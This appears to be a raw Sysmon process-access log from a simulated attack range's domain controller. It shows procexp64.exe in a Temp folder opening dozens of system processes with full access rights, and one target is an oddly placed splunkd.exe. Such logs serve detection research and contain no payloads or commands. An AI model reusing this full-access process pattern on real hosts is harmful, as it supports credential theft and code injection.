15:16:26.048{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788813Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:26.048{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788812Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:26.048{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788811Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:26.048{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788810Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:26.048{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788809Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:26.048{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788808Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:26.048{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788807Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:26.048{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788806Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:26.048{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9401-00000000A301}5084C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788805Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:26.048{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788804Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:26.048{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788803Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:26.048{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788802Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:26.048{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788801Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:26.048{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788800Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:26.048{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788799Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:26.048{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788798Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:26.048{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788797Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:26.048{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788796Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:26.048{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788795Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:26.048{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788794Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:26.048{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788793Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:26.048{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788792Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:26.048{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788791Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:26.048{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788790Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:26.048{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788789Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:26.048{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788788Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:26.048{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788787Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:26.048{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788786Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:26.048{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788785Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:26.048{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788784Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:26.048{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788783Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:26.048{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788782Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:26.048{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788781Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:26.048{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788780Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:26.048{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788779Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:26.048{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788778Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:26.048{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788777Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:26.048{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 